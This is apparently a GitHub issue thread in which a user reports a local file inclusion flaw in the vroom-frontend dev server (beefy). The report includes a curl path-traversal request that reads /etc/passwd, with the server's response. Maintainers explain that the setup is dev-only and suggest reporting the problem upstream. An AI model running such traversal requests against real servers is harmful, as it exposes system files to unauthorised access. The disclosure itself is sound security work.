search

VROOM-Project / vroom-frontend

Web frontend for VROOM
http://map.vroom-project.org/
BSD 2-Clause "Simplified" License
28 stars 30 forks source link

Local File Inclusion #70

Closed fitzg2 closed 2 months ago

fitzg2 commented 2 months ago

Be careful about exposing this to the internet

$ curl --path-as-is -i -s -k "http://public-ip:9966/../../../../../../../../../../../../../../../../etc/passwd"
HTTP/1.1 200 OK
content-type: application/octet-stream
Date: Wed, 31 Jul 2024 23:38:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Also it says it's running on 127.0.0.1 when in reality it listens on all hosts for some reason.

jcoupey commented 2 months ago

Well, the beefy way of serving things is convenient for dev purposes because it will update on changes. It is definitely not meant as a production setup. In fact we have a dedicated script to build and generate a standalone folder, under npm run dist.

fitzg2 commented 2 months ago

Right. Maybe this is more of an issue with beefy.. given that it listens on all IPs regardless of any flags

jcoupey commented 2 months ago

Probably makes sense to report this upstream? In which case I guess we could close here.